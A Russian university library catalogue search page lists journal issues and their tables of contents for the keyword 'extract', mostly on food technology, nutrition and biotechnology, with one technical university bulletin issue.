Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

113 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Экстракт")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 16
1. 
Вопросы питания. - Журнал, 2008г. № 4
Оглавление 
  • Тутельян, В. А. Биологически активные добавки к пище: современные подходы к обеспечению качества и безопасности / В. А. Тутельян, Б. П. Суханов. - с.4-15
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
  • Коденцова, В. М. Пищевые продукты, обогащенные витаминами и минеральными веществами: их роль в обеспечении организма микронутриентами / В. М. Коденцова, О. А. Вржесинская : 16-25
  • Зингеренко, В. Б. Современные представления о нарушении обмена веществ у больных, находящихся в критических состояниях / В. Б. Зингеренко. - с.26-31
  • Гмошинская, М. В. Изучение суммарной антигенности кисломолочных продуктов / М. В. Гмошинская, И. В. Гмошинский, С. Н. Зорин. - с.32-39
    Кл. слова: ПРОДУКТ КИСЛОМОЛОЧНЫЙ
  • Оценка эффективности использования в диетотерапии больных сахарным диабетом типа 2 биологически активной добавки, содержащей экстракт курильского чая. - с.52-57
    Кл. слова: БАД, ЧАЙ КУРИЛЬСКИЙ
  • Влияние таблетированного зеленого чая на показатели антиоксидантного статуса пациентов с заболевание органов пищеварения / ; В. И. Пилипенко, А. К. Шаховская, Г. Ю. Мальцев, В. А. Исаков. - с.58-62
Держатели документа (Информация об экземплярах) 
2. 
Кондитерское и хлебопекарное производство. - Журнал, 2004г. № 11
Оглавление 
  • Петрова, С. Н. Применение смесей растительных масел "Союз" при производстве печенья / С. Н. Петрова, Л. И. Степанова. - с.1-2
  • Оборудование компании FIS для новых видов конфет. - с.3
  • Влияние давления на реологические характеристики конфетных и шоколадных масс / ; Ю. А. Мачихин, Ю. Ф. Белокрылов, С. М. Калинина, Ливинский А. А.. - с.4-5
  • Мельник, Е. В. Способность пищевых ингредиентов связывать тяжелые металлы / Е. В. Мельник. - с.6-7
  • Жушман, А. И. Применение нативных и модифицированных крахмалов в кондитерской промышленности / А. И. Жушман. - с.8-9
  • Диденко, В. М. Применение ПАВ для улучшения качества пряников / В. М. Диденко. - с.12
  • Иванова, Н. В. Экстракт чая "Мате" для кондитерских изделий функционального назначения / Н. В. Иванова. - с.13
  • Термоупаковочное оборудование для хлебобулочных и кондитерских изделий. - с.15
Держатели документа (Информация об экземплярах) 
3. 
Пищевая промышленность. - Журнал, 2010г. № 1
Оглавление 
  • Скрынник, Е. Б. Основные направления развития пищевой и перерабатывающей промышленности на среднесрочную перспективу / Е. Б. Скрынник. - с.4-9
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ, РЫНОК ПРОДОВОЛЬСТВЕННЫЙ
  • Казакова, Е. В. Защитное съедобное покрытие на основе белков / Е. В. Казакова, Л. С. Кузнецова. - с.16-18
    Кл. слова: УПАКОВКА СЪЕДОБНАЯ, ПОКРЫТИЕ СЪЕДОБНОЕ
  • Калошин, Ю. А. Новая классификация фасовочных устройств / Ю. А. Калошин, С. М. Шамшурко. - с.20-21
    Кл. слова: УСТРОЙСТВО фасовочное, ФАСОВКА, ДОЗАТОР жидкости
  • Федотова, О. Б. "Активная упаковка" из полимерных материалов / О. Б. Федотова, Д. М. Мяленко, А. В. Шалаева. - с.22-23
    Кл. слова: ПОЛИМЕР, УПАКОВКА, ПЛЕНКА полиэтиленовая
  • Вельтищев, В. Н. Установка для промывания колпачков / В. Н. Вельтищев, Ю. А. Калошин, С. Г. Токарева. - с.24
  • Гадлгареева, Р. Р. Транспортная логистика как элемент системы качества на предприятиях общественного питания / Р. Р. Гадлгареева, В. В. Касаткин, А. Г. Ларионова. - с.26
    Кл. слова: ЛОГИСТИКА ТРАНСПОРТНАЯ, ПЕРЕВОЗКА ТОВАРА, ПИТАНИЕ ОБЩЕСТВЕННОЕ - ЛОГИСТИКА
  • Пивоваров, В. И. Основные направления обеспечения продовольственной безопасности населения / В. И. Пивоваров. - с.35
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННАЯ
  • Кретов, И. Т. Влияние концентрирования на аминокислотный состав творожной сыворотки / И. Т. Кретов, В. Ю. Овсянников, С. Л. Панченко. - с.44-45
    Кл. слова: СЫВОРОТКА, КОНЦЕНТРИРОВАНИЕ, АМИНОКИСЛОТА
  • Резго, Г. Я. Сохраняемость пищевых продуктов / Г. Я. Резго. - с.46-48
    Кл. слова: УБЫЛЬ ЕСТЕСТВЕННАЯ, ХРАНЕНИЕ ПИЩЕВЫХ ПРОДУКТОВ, ПОТЕРИ ТОВАРНЫЕ
  • Эм, В. Г. Использование плодоовощного сырья в производстве мармелада / В. Г. Эм, А. А. Сапарбекова, У. Ч. Чоманов. - с.50-51
    Кл. слова: МАРМЕЛАД, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Новый полуфабрикат для пищеконцентратной промышленности. - с.51-52
    Кл. слова: КОНЦЕНТРАТ, ПОЛУФАБРИКАТЫ ягодные, ПОЛУФАБРИКАТЫ фруктовые
  • Гладкова, И. А. Молочно-растительная основа для напитков функционального назначения / И. А. Гладкова, М. Е. Успенская, Л. В. Антипова. - с.54-56
    Кл. слова: ЭКСТРАКТ молочно-РАСТИТЕЛЬНЫЙ, АМАРАНТ, БОБЫ нута
  • Австриевских, А. Н. Новые формы концентратов сладких блюд / А. Н. Австриевских, В. В. Бебенин, В. М. Позняковский. - с.56-57
    Кл. слова: КИСЕЛЬ, КОНЦЕНТРАТ
4. 
Вопросы питания. - Журнал, 2009г. № 2
Оглавление 
  • Нанотехнологии в пищевых производствах: перспективы и проблемы. - с.4-17
    Кл. слова: НАНОМАТЕРИАЛ, БИОДОСТУПНОСТЬ, БИОБЕЗОПАСНОСТЬ
  • Ускова, М. А. Антиоксидантные эффекты молочнокислых бактерий - пробиотиков и йогуртовых заквасок / М. А. Ускова, Л. В. Кравченко. - с.18-23
    Кл. слова: ПРОБИОТИКИ, БАКТЕРИИ молочнокислые, антиоксиданты
  • Медико-биологическая оценка безопасности генно-инженерно-модифицированной кукурузы линии MIR604. - с.24-32
    Кл. слова: КУКУРУЗА генно-модифицированная, MIR 604
  • Токаев, Э. С. Разработка нового синбиотического пищевого продукта с высоким содержанием бифидобактерий / Э. С. Токаев, А. А. Максимов. - с.39-41
    Кл. слова: экстракт дрожжевой, БИФИДОБАКТЕРИЯ
  • Влияние плесневых грибов, потребляемых с пищей, на кишечную микрофлору у крыс. - с.42-46
    Кл. слова: МИКРОФЛОРА
  • Активность пищеварительных ферментов у потомства крыс, получавших во время лактации рацион, контаминированный тяжелыми металлами. - с.47-50
    Кл. слова: ЛАКТАЦИЯ, МЕТАЛЛЫ ТЯЖЕЛЫЕ
  • Конденцова, В. М. О рекомендуемых нормах потребления витаминов A, E, C и B2 / В. М. Конденцова, О. А. Вржесинская. - с.51-56
    Кл. слова: ВИТАМИНЫ - ПИТАНИЕ
  • Влияние гипокалорийной диеты, обогащенной биологически активными веществами c антиоксидантным действием, на клинико-метаболические показатели у больных сахарным диабетом типа 2. - с.57-62
    Кл. слова: ДИАБЕТ САХАРНЫЙ, АНТИОКСИДАНТЫ, ДИЕТА ГИПОКАЛОРИЙНАЯ
  • Коркин, А. Л. Влияние празиквантела и препарата, содержащего урсодезоксихолевую кислоту, на литогенные свойства желчи у больных с опистархозом на фоне основного варианта стандартной диеты / А. Л. Коркин. - с.63-66
    Кл. слова: опистархоз, КИСЛОТА урсодезоксихолевая
  • Вировец, О. А. О повышенных потерях макро- и микроэлементов при занятии спортом и целесообразности их компенсации биологически активными добавками / О. А. Вировец. - с.67-72
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА, СПОРТ - питание
  • Теоретические предпосылки к разработке индивидуального питания спортсменов. - с.73-76
    Кл. слова: СПОРТ - ПИТАНИЕ
  • Макаров, В. Н. Получение низкокалорийных фруктовых компотов с применением натуральных подсластителей / В. Н. Макаров. - с.77-78
    Кл. слова: КОМПОТ, ПОДСЛАСТИТЕЛЬ натуральный
Держатели документа (Информация об экземплярах) 
5. 
Вестник Астраханского государственного технического университета. - Журнал, 2013г. № 1
Оглавление 
  • Алексанян, И. Ю. Математическое моделирование тепломассопереноса при распылительной сушке растительных экстрактов / И. Ю. Алексанян, Ю. А. Максименко, Ю. С. Феклунова. - с.9-13. - Библиогр. в конце ст. : ил.
    Кл. слова: Моделирование технологических процессов, Сушка, Растительный экстракт
  • Белов, С. В. Оценка степени злоумышленного интереса к различным компонентам объекта защиты / С. В. Белов, Б. Р. Досмухамедов. - с.14-20. - Библиогр. в конце ст. : табл.
    Кл. слова: Угрозы информационной безопасности, Модель злоумышленного воздействия
  • Гордеева, Ю. Л. Стационарные состояния биотехнологических процессов с нелинейной кинетикой роста микроорганизмов. Множественность при заданной величине концентрации субстрата в поступающем потоке / Ю. Л. Гордеева [и др.]. - с.21-28. - Библиогр. в конце ст. : ил.
    Другие авторы: Щербинин М. Ю., Гордеев Л. С., Комиссаров Ю. А.
    Кл. слова: Биотехнология, Нелинейная кинетика, Микробиологический синтез
  • Исмагулова, А. И. Моделирование процесса измерения динамического уровня жидкости в штанговой глубинно-насосной установке на основе средств динамометрирования / А. И. Исмагулова, Н. Г. Романенко. - с.29-37. - Библиогр. в конце ст. : ил.
    Кл. слова: Штанговые глубинно-насосные установки, Динамограмма, Уровень жидкости в скважине
  • Кипер, А. В. Разработка системы поддержки принятия решений руководителя тушения пожара на базе нечеткой нейронной сети ANFIS при пожаре на территории морского порта / А. В. Кипер, Т. С. Станкевич. - с.38-46. - Библиогр. в конце ст. : ил.
    Кл. слова: Система поддержки принятия решений, ANFIS, Нейронная нечеткая система
  • Кревенцов, Е. Г. Модификация расчета матрицы обратной связи по состоянию для линейных многомерных объектов / Е. Г. Кревенцов. - с.47-52. - Библиогр. в конце ст. : ил.
    Кл. слова: Модальное управление, Компенсация нулей, Модификация алгоритма расчета обратной связи
  • Кригер, Л. С. Нечеткая ситуационная сеть для управления движением общественного транспорта / Л. С. Кригер. - с.53-58. - Библиогр. в конце ст. : ил.
    Кл. слова: Нечеткая ситуационная сеть, Общественный транспорт
  • Путилин, С. С. Разработка системы управления холодильной установкой, учитывающей изменения параметров внешней среды / С. С. Путилин. - с.59-64. - Библиогр. в конце ст. : ил.
    Кл. слова: Холодильная установка, Идентификация эксплуатационных параметров
  • Цыкунов, А. М. Робастная система стабилизации для объекта с запаздыванием по состоянию / А. М. Цыкунов. - с.65-73. - Библиогр. в конце ст. : ил.
    Кл. слова: Робастное управление, Вектор состояния
  • Дубровин, В. С. Многоконтурная система стабилизации управляемого генератора / В. С. Дубровин, В. В. Никулин. - с.74-82. - Библиогр. в конце ст. : ил.
    Кл. слова: Генератор, Релейный элемент, Передаточная функция
  • Мыколенко, Д. А. Повышение эффективности взаимодействия группы компьютеров с питающей сетью / Д. А. Мыколенко, Ю. Б. Томашевский. - с.83-89. - Библиогр. в конце ст. : ил.
    Кл. слова: Системный подход, Импульсный источник питания, Коэффициент коррекции мощности
  • Попов, Г. А. Оценка степени приемлемости методов оптимизации для решения задач защиты информации / Г. А. Попов, Е. А. Попова. - с.90-99. - Библиогр. в конце ст. : табл.
    Кл. слова: Задачи защиты информации, Методы оптимизации, Степень приемлемости
  • Шишкин, Н. Д. Системный анализ и алгоритмы расчета комбинированных солнечно-ветровых установок / Н. Д. Шишкин, Е. А. Манченко. - с.100-108. - Библиогр. в конце ст. : ил.
    Кл. слова: Солнечно-ветровые установки
  • Алешкин, В. В. Программная платформа исследования алгоритмов избыточных интегрированных навигационных систем / В. В. Алешкин, А. С. Матвеев, П. Н. Голованов. - с.109-117. - Библиогр. в конце ст. : ил.
    Кл. слова: инерциальный измерительный блок, Спутниковая система, Полунатурное моделирование
  • Барабанова, Е. А. Разработка универсального алгоритма для многокаскадных коммутаторов с параллельной настройкой / Е. А. Барабанова, Н. С. Мальцева, И. О. Барабанов. - с.118-125. - Библиогр. в конце ст. : ил.
    Кл. слова: Многокаскадная коммутационная система, Параллельный поиск, Коммутационный блок
  • Пищин, О. Н. Повышение качества предоставления услуг в подвижных системах радиосвязи / О. Н. Пищин, Е. В. Сергеева. - с.126-132.. - Библиогр. в конце ст.
    Кл. слова: Качество услуг радиосвязи, Затухание уровня поля в помещениях, Сотовая подвижная радиосвязь
  • Сорокин, А. А. Разработка методики определения времени использования канального ресурса для моделирования инфокоммуникационных систем с динамической топологией сети, предназначенных для обслуживания водных путей / А. А. Сорокин. - с.133-143. - Библиогр. в конце ст. : ил.
    Кл. слова: Инфокоммуникационная система, Канальный ресурс, Программный комплекс
  • Ажмухамедов, И. М. Методология моделирования плохоформализуемых слабоструктурированных социотехнических систем / И. М. Ажмухамедов, О. М. Проталинский. - с.144-154. - Библиогр. в конце ст. : ил.
    Кл. слова: Нечеткое когнитивное моделирование, Индекс схожести, Синтез управляющих решений
  • Григорьев, О. В. Управление стратегическими рисками грузового порта с применением имитационного моделирования / О. В. Григорьев, И. О. Бондарева, Э. А. Латыпова. - с.155-162. - Библиогр. в конце ст. : ил.
    Кл. слова: Грузовой порт, Комплексная система управления рисками, Стратегическая карта грузового порта
  • Фионова, Л. Р. Построение модели специалиста в сфере документационного обеспечения управления на основе компетентностного подхода / Л. Р. Фионова. - с.163-173. - Библиогр. в конце ст. : ил.
    Кл. слова: Модель специалиста и обучаемого, Результат обучения, Компетентностный подход
  • Шутова, Т. В. Экономическая интерпретация оптимизаций финансовых средств, выделенных головной организацией смежным предприятием при военно-техническом сотрудничестве / Т. В. Шутова, Ю. А. Комиссаров. - с.174-179. - Библиогр. в конце ст. : ил.
    Кл. слова: Высокотехнологичный комплекс, Блок-схема метода ветвей и границ
  • Большаков, А. А. Разработка модели информационных процессов при синтезе интеллектуальной обучающей системы с учетом психофизических характеристик обучаемых / А. А. Большаков, А. Ю. Маркелов. - с.180-186. - Библиогр. в конце ст. : ил.
    Кл. слова: Комбинированная модель информационных процессов, Интеллектуальная обучающая система, Методика оценки знаний
  • Карпасюк, И. В. Некоторые особенности и тенденции прикладной математической подготовки студентов технического университета, обучающихся по направлениям IT-профиля / И. В. Карпасюк. - с.187-193. - Библиогр. в конце ст. : табл.
    Кл. слова: Прикладная математическая подготовка, Проектный метод, Вычислительная математика
  • Лаптев, В. В. Метод оценивания умений и навыков при обучении программированию / В. В. Лаптев. - с.194-201. - Библиогр. в конце ст. : ил.
    Кл. слова: Обучающая система, Энтропия
  • Мирзабекова, О. В. Программные средства дистанционного обучения теоретической механике: требования и возможные пути реализации / О. В. Мирзабекова, А. В. Хохлов. - с.202-207. - Библиогр. в конце ст. : ил.
    Кл. слова: Дистанционное обучение теоретической механике, Программные средства обучения решению задач, Разборщик формул
  • Сибикина, И. В. Мониторинг качества подготовки выпускника вуза при осуществлении компетентностного подхода / И. В. Сибикина, И. В. Космачёва, Н. В. Давидюк. - с.208-214. - Библиогр. в конце ст. : ил.
    Кл. слова: Мониторинг качества образования, Автоматизированные системы управления вузом
Держатели документа (Информация об экземплярах) 
Полный текст
6. 
Биотехнология. - Журнал, 2018г. № 1
Оглавление 
  • Максимова, Ю. Г. Биотехнологические подходы к биоремедиации окружающей среды,загрязненной тринитротолуолом / Ю. Г. Максимова, А. Ю. Максимов, В. А. Демаков. - с.9-23. - Библиогр.: с.
    Кл. слова: микроорганизм, биодеградация, нитроредуктаза
  • Дюкова, К. Г. Сравнительный анализ оптимальных условий функционирования штаммов - продуцентов с выраженной аспартазной активностью / К. Г. Дюкова [и др.]. - с.24-34. - Библиогр. в конце ст.
    Другие авторы: Измаилян М. С., Киносян М. А., Давидян Т. С.
    Кл. слова: аспартаза, аспарагиновая кислота, биотрансформация
  • Кудрявцева, О. М. Иммунологическая эффективность и безопасность синтезированных олигодезоксинуклеотидов CpG / О. М. Кудрявцева [и др.]. - с.35-44. - Библиогр. в конце ст.
    Другие авторы: Семакова А. П., Микшис Н. И., Попова П. Ю.
    Кл. слова: адьювант, антиген, сибиреязвенная вакцина
  • Проценко, М. А. Подбор питательных сред для глубинного культивирования дереворазрушающего гриба Daedaleopsis tricolor (Bull.) Bondartsev et Singer / М. А. Проценко, Н. Е. Костина, Т. В. Теплякова. - с.45-51. - Библиогр. в конце ст.
    Кл. слова: мицелий, соединение, антиоксидантная активность
  • Ян, Л. Соматический эмбриогенез и растительная регенерация маньчжурского ясеня (Fraxinus mandshurica Rupr.) / Л. Ян [и др.]. - с.52-61. - Библиогр. в конце ст.
    Другие авторы: Ван Ц., Суханова Е. С., Шен Х. Л.
    Кл. слова: зародыш, регенерация, растение
  • Сидорова, Д. Е. Синтез наночастиц серебра с использованием экстрактов травянистых растений и воздействие наночастиц на бактерии / Д. Е. Сидорова [и др.]. - с.62-71. - Библиогр. в конце ст.
    Другие авторы: Липасова В. А., Надточенко В. А., Баранчиков А. Е.
    Кл. слова: антибактериальная активность, биосинтез, экстракт растений
Держатели документа (Информация об экземплярах) 
7. 
Вестник Астраханского государственного технического университета. - Журнал, 2013г. № 1
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
8. 
Пищевая промышленность. - Журнал, 2009г. № 9
Оглавление 
  • Панфилов, В. А. Разработка образа пищевого предприятия XXI века - необходимое условие систематического развития технологий и техники / В. А. Панфилов. - с.8-10
    Кл. слова: ПРЕДПРИЯТИЕ ПИЩЕВОЕ
  • Акулич, А. В. Сушка плодоовощного сырья с использованием ИК-излучения / А. В. Акулич, А. В. Темрук. - с.12-13
    Кл. слова: СУШКА инфракрасная, СЫРЬЕ плодоовощное, СУШИЛКА комбинированная
  • Тукачев, В. Е. Устройства нового поколения для резки и сушки макаронных изделий / В. Е. Тукачев, М. В. Калачев, Ю. В. Зуева. - с.14-16
    Кл. слова: РЕЗКА макаронных изделий, СУШКА МАКАРОННЫХ ИЗДЕЛИЙ
  • Шуляк, В. А. Обжарочные аппараты малой производительности / В. А. Шуляк, А. В. Булгак. - с.18-21
    Кл. слова: АППАРАТ обжарочный
  • Шкоп, Я. Я. Технология КНП-фриго для производства функциональной пищи / Я. Я. Шкоп. - с.22-23
    Кл. слова: КОНЦЕНТРАТ натуральных продуктов
  • Влияние нанотехнологических добавок морского генеза на свойства эмульсионных продуктов. - с.30-32
    Кл. слова: МАЙОНЕЗ, ПОЛИСАХАРИДЫ, ЭМУЛЬГАТОР
  • Бердутина, А. В. Методика определения эмульсионных свойств белковых препаратов / А. В. Бердутина, А. С. Громов. - с.35-37
    Кл. слова: ПРЕПАРАТ белковый
  • Феофилактова, О. В. Разработка соусов с применением эубиотических микроорганизмов и их метаболитов / О. В. Феофилактова, А. В. Казаков. - с.38-39
    Кл. слова: СОУСЫ
  • Матисон, В. А. Улучшение качества системы управления персоналом / В. А. Матисон. - с.48-49
    Кл. слова: УПРАВЛЕНИЕ ПЕРСОНАЛОМ
  • Арутюнова, Н. И. Формирование концепции нового продукта питания на основе оценки требований потребителей / Н. И. Арутюнова, В. А. Матисон. - с.50-51
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ
  • Шанин, А. А. Современные высокоэффективные моющие и дезинфицирующие средства для пищевой промышленности / А. А. Шанин, Ю. А. Корнев. - с.52-53
    Кл. слова: СРЕДСТВА МОЮЩИЕ, СРЕДСТВА дезинфицирующие
  • Хасанова, С. Д. Продление сроков хранения помадных конфет / С. Д. Хасанова, З. Г. Скобельская. - с.54-55
    Кл. слова: КОНФЕТЫ, СРОК ХРАНЕНИЯ ПРОДУКТОВ
  • Евдокимова, О. В. Товарные свойства культивируемого женьшеня / О. В. Евдокимова. - с.56-57
    Кл. слова: женьшень
  • Как улучшить качество сметанного продукта?. - с.58-60
    Кл. слова: СМЕТАНА, КАЧЕСТВО ПРОДУКЦИИ
  • Экстракт фукуса для производства продуктов, обогащенных йодом. - с.61
    Кл. слова: фукус, ЙОД - ПИТАНИЕ
  • Жадан, П. В икре самое "лакомое" - антибиотики? / П. Жадан. - с.63
    Кл. слова: ИКРА
  • Бакуменко, О. Е. Принципы разработки функциональных продуктов для студентов / О. Е. Бакуменко, Т. В. Иванникова, Ю. О. Натокина. - с.64-65
    Кл. слова: ПИТАНИЕ СТУДЕНТОВ
  • Роль функционального питания в коррекции йоддефицитных состояний. - с.66-68
    Кл. слова: ПИТАНИЕ ФУНКЦИОНАЛЬНОЕ, ПРОДУКТЫ йодированные
9. 
Пищевая промышленность. - Журнал, 2007г. № 5
Оглавление 
  • Пищевые волокна в продуктах питания. - с.8-10
    Кл. слова: ВОЛОКНО ПИЩЕВОЕ, ПРОДУКТЫ ПИТАНИЯ
  • Смирнов, Е. В. Экстракты и ароматизаторы ванили / Е. В. Смирнов. - с.14-17
    Кл. слова: ВАНИЛЬ
  • Евелева, В. В. Полифункциональная пищевая добавка "Дилактин - S" / В. В. Евелева, И. Б. Новицкая, В. М. Диденко. - с.18-20
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
  • Ван, Моурик С. В. В фокусе сладости: сладкая альтернатива / Моурик С. В. Ван. - с.24-25
    Кл. слова: СЛАДОСТИ
  • Яшин, А. Я. Определение содержания природных антиоксидантов в пищевых продуктах и БАДах / А. Я. Яшин, Н. И. Черноусова. - с.28-30
    Кл. слова: БАД, ПРОДУКТЫ ПИЩЕВЫЕ, АНТИОКСИДАНТЫ
  • Баулина, О. Н. Развитие пищевых технологий: использование растительных экстрактов / О. Н. Баулина. - с.32-33
    Кл. слова: экстракт растительный
  • Колесников, В. А. Производство функциональных продуктов питания с использованием пищевых свекловичных волокон / В. А. Колесников, А. И. Артеменко, М. В. Лукьяненко. - с.34-35
    Кл. слова: ВОЛОКНО ПИЩЕВОЕ
  • Николаенко, О. Ю. Соевые проростки и их использование / О. Ю. Николаенко, В. П. Корчагин. - с.36-37
    Кл. слова: СОЯ
  • Кайшев, В. Г. Анализ макроэкономических показателей развития пищевой и перерабатывающей промышленности Российской Федерации за 1995 - 2006 гг. / В. Г. Кайшев. - с.42-45
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ - СТА, ПРОМЫШЛЕННОСТЬ ПЕРЕРАБАТЫВАЮ
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь - февраль 2007 г.. - с.46-47
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ - СТА, ПРОМЫШЛЕННОСТЬ ПЕРЕРАБАТЫВАЮ
  • Турушин, Ю. В. Мониторинг состояния и развития предприятий пищевой промышленности / Ю. В. Турушин. - с.48-49
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ
  • Чичельницкий, Е. Ю. Внешний рынок мясной, молочной и рыбной продукции / Е. Ю. Чичельницкий. - с.50-52
    Кл. слова: РЫНОК МОЛОЧНОЙ ПРОДУКЦИИ, РЫНОК МЯСНОЙ ПРОДУКЦИИ , РЫНОК РЫБЫ
  • Шаматов, И. К. Российский рынок сахара: сегодня и завтра / И. К. Шаматов, Р. А. Сулейманов. - с.53
    Кл. слова: рынок сахара
  • Алексеева, Е. В. Совершенствование организационной структуры системы управления качеством и безопасностью / Е. В. Алексеева. - с.72-73
    Кл. слова: УПРАВЛЕНИЕ КАЧЕСТВОМ, УПРАВЛЕНИЕ БЕЗОПАСНОСТЬЮ
  • Касьяненко, А. Успех партнерства промышленности и государственных организаций в области пищевой безопасности (опыт Канады) / А. Касьяненко, С. Оболенский, С. Джойл. - с.74-75
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВАЯ - КАНАДА
  • Новоселов, Я. Б. Мониторинг рынка БАД к пище и специализированных продуктов питания / Я. Б. Новоселов, А. Р. Антонов. - с.76-77
    Кл. слова: БАД
Держатели документа (Информация об экземплярах) 
10. 
Физико-химические основы конструирования и исследования свойств наноразмерных биоструктур [Текст] / ОмГТУ, 2013. - 43 с.
Держатели документа (Информация об экземплярах) 
11. 
Дроздовский В. Ф. Влияние структуры регенерата на свойства регенерата и качество резин [Текст] / В. Ф. Дроздовский, 1977. - 89, [3] с.
12. 
Хлебопечение России. - Журнал, 2004г. № 2
Оглавление 
  • Косован, А. П. Рыночная экономика и базовые тенденции развития хлебопекарной промышленности России / А. П. Косован. - с.2-3
  • Чубенко, Н. Т. К вопросу о производстве хлеба с добавками железа / Н. Т. Чубенко. - с.4-5
  • Росляков, Ю. Ф. Социальная оценка хлебобулочных изделий, вырабатываемых в Краснодарском крае / Ю. Ф. Росляков, В. В. Тишковский. - с.6-7
  • Ильина, О. А. Традиции обучения хлебопеков в Международной промышленной академии / О. А. Ильина. - с.8-10
  • Бочарников, А. А. "Мосхлеб": взгляд со стороны / А. А. Бочарников, Н. Т. Чубенко. - с.11-13
  • Шлеленко, Л. А. Современный ассортимент хлебобулочных изделий для профилактического и лечебного питания / Л. А. Шлеленко. - с.17-18
  • Акжигитова, Л. В. Совершенствование технологии приготовления теста с использованием солодовых продуктов / Л. В. Акжигитова. - с.19
  • Санина, Т. В. Повышение качества хлеба из биоактивированного зерна пшеницы / Т. В. Санина, И. В. Черемушкина, Н. Н. Алехина. - с.20-21
  • Белявская, И. Г. Применение биологически активной добавки "Сплат" в хлебопекарном производстве / И. Г. Белявская. - с.22
  • Использование стевиозида при производстве хлебобулочных изделий функционального назначения / ; О. Л. Вершинина, З. И. Асмаева, Ю. Ф. Росляков, Слибо Н. Е.. - с.23
  • Хабахпашев, А. М. Витамизированный хлеб - новый выгодный рынок! / А. М. Хабахпашев. - с.23-24
  • Комплексные пищевые добавки с лецитином для хлебопечения / ; Н. А. Леонтьева, А. П. Нечаев, В. В. Тарасова и др.. - с.25
  • Пучкова, Л. И. Экстракт зеленого чая - источник биофлавоноидов в хлебобулочных изделиях функционального назначения / Л. И. Пучкова, И. Г. Белявская, Ж. М. Жамукова. - с.26
  • Бекалюк, А. Е. Отечественные хлебопродукты лечебного и профилактического направления "От Михалыча" / А. Е. Бекалюк. - с.27
  • Троицкий, Б. Н. Опыт производства мармелада в условиях хлебопекарных предприятий / Б. Н. Троицкий, А. В. Солодовник, Г. Н. Горячева. - с.28-29
  • Дремучева, Г. Ф. Рефрактометр прецизионный ИФР-478 для определения автолитической активности муки / Г. Ф. Дремучева, Е. Н. Лукач, В. В. Левченко. - с.30
  • О возможности использования низинобразующих штаммов лактококков для подавления "картофельной болезни" хлеба / ; Л. И. Кузнецова, Е. Н. Павловская, О. В. Афанасьева и др.. - с.31-33
  • Ремонт тестоделительных устройств вакуумного типа методом электроискровой наплавки / ; Ф. Х. Бурумкулов, В. И. Иванов, П. Н. Евсеев. - с.34-36
  • Тоннельная печь ППП - продолжение традиций на московском хлебозаводе №22. - с.38
Держатели документа (Информация об экземплярах) 
13. 
Вопросы питания. - Журнал, 2011г. т. 80 № 6
Оглавление 
  • Взаимосвязь изменений показателей перекисного окисления липидов, коэнзима Q 10 и свободных жирных кислот у крыс под влиянием жирового компонента рациона. - с.4-8
  • Токсиколого-гигиеническая характеристика наночастиц серебра, вводимых в желудочно-кишечный тракт крыс. - с.9-18
  • Потолицына, Н. Н. Липидный обмен у подростков - коренных жителей европейского Севера России / Н. Н. Потолицына, А. Ю. Людинина, Е. Р. Бойко. - с.19-22
  • Изучение пищевого поведения потребителей. - с.23-26
  • Ефимочкина, Н. Р. Значение некоторых потенциально патогенных микроорганизмов в возникновении пищевых токсикозов / Н. Р. Ефимочкина, И. Б. Куваева, Ф. С. Флуер. - с.27-34
  • Влияние пшеничных отрубей на обеспеченность организма витаминами. - с.35-42
  • Коденцова, В. М. Требования к качеству витаминов в составе премиксов и пищевых добавок / В. М. Коденцова, О. А. Вржесинская, В. В. Бессонов. - с.43-46
  • Сазонова, О. В. Пищевой статус у больных гемофилией с поражением суставов / О. В. Сазонова, Ю. А. Косякова, И. Л. Давыдкин. - с.47-51
  • Углицких, А. К. Эффективность комплексной системы диетологического обеспечения детей в критических состояниях / А. К. Углицких. - с.52-58
  • Супы в питании человека. - с.59-61
  • Обеспеченность селеном при хронической сердечной недостаточности различной этиологии. - с.62-66
  • Козлова, О. И. Определение методом высокоэффективной хроматографии стероидных сапонинов в биологически активных добавках к пище, содержащих экстракт якорцев стелющихся / О. И. Козлова, О. И. Передеряев, Г. В. Раменская. - с.67-71
  • Новый источник органических форм цинка. - с.72-75
  • Особенности пищевого статуса, антропометрических и клинико-биохимических показателей у профессиональных спортсменов, занимающихся различными видами спорта. - с.76-81
  • Сорокин, П. L-карнитин в детском питании / П. Сорокин. - с.82-83
  • Разгрузочно-диетическая терапия на современном этапе. - с.84
Держатели документа (Информация об экземплярах) 
14. 
Пищевая промышленность. - Журнал, 2004г. № 6
Оглавление 
  • Сизенко, Е. И. Проблемы хранения продукции АПК / Е. И. Сизенко. - с.9-11
    Кл. слова: ХРАНЕНИЕ ПРОДУКТОВ АПК
  • Кайшев, В. Г. Плодоовощная промышленность России в 1999-2003 гг. / В. Г. Кайшев, В. М. Черкасова. - с.12-16
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПЛОДООВОЩНАЯ
  • Пенто, В. Б. Технология производства продукта промежуточной влажности из картофеля / В. Б. Пенто, О. А. Клюева. - с.18-19
    Кл. слова: Картофель - полуфабрикаты
  • Производство плодово-ягодных маринадов с использованием растительного сырья Западной Сибири / ; О. В. Голуб, В. М. Поздняковский, И. Н. Ковалевская, С. Б. Васильева. - с.20-21
    Кл. слова: Маринад плодово-ягодный
  • Троян, З. А. Высокотемпературная стерилизация в потоке соков с мякотью / З. А. Троян, Л. В. Михайлюта, Н. Н. Корастилева. - с.22-23
